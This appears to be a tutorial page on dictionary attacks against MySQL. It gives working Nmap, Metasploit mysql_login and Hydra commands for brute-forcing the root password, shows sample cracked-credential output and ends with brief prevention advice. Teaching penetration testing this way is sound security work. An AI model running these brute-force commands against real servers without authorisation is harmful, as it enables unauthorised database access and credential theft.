What is a Dictionary Attack?¶

A dictionary attack is a password-guessing technique where a list of common passwords (a wordlist) is used to attempt authentication repeatedly until a valid password is found. For MySQL, this helps identify weak or default credentials that may compromise database security.

Step 1: Identify MySQL Service with Nmap¶

First, confirm that the MySQL service is running on the target system and enumerate its version.

nmap <IP Address> -p 3306 -sV

Explanation:

-p 3306 → Scans MySQL's default port
-sV → Identifies the service and version details

Example Output:

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.7.42

This confirms MySQL is reachable and running.

Step 2: Perform MySQL Dictionary Attack using Metasploit¶

Launch Metasploit Framework:

msfconsole

Load the MySQL login scanner module:

use auxiliary/scanner/mysql/mysql_login

Configure the options:

set rhosts <IP Address>
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set verbose false
set stop_on_success true
set username root
run

Parameter Breakdown:

rhosts → Target host IP
pass_file → Wordlist containing possible passwords
stop_on_success → Stops attack when a working credential is found
username → Username to brute-force

Expected Success Output:

[+] 3306 - Login Successful: root:password123

Hydra is a fast password-guessing tool commonly used for different protocols, including MySQL.

Command:

hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP Address> mysql

Explanation:

-l root → Username to attack
-P → Path to wordlist
mysql → Target service protocol

Example Output:

[3306][mysql] host: 192.168.1.10 login: root password: admin123

When to Use Which Tool?¶

Tool	Purpose	Strength
Nmap	Identify service & version	Fast reconnaissance
Metasploit	More advanced exploitation	Can stop on success & gives detailed output
Hydra	Faster brute forcing	Supports many protocols

Prevention (Security Best Practices)¶

To protect MySQL servers against dictionary attacks:

Use strong, complex passwords
Disable remote root login
Limit MySQL access to trusted IPs only
Implement firewall rules
Monitor login attempts and enable logging

What is a Dictionary Attack?¶

Step 1: Identify MySQL Service with Nmap¶

Step 2: Perform MySQL Dictionary Attack using Metasploit¶

Step 3: Perform SQL Login Attack using Hydra¶

When to Use Which Tool?¶

Prevention (Security Best Practices)¶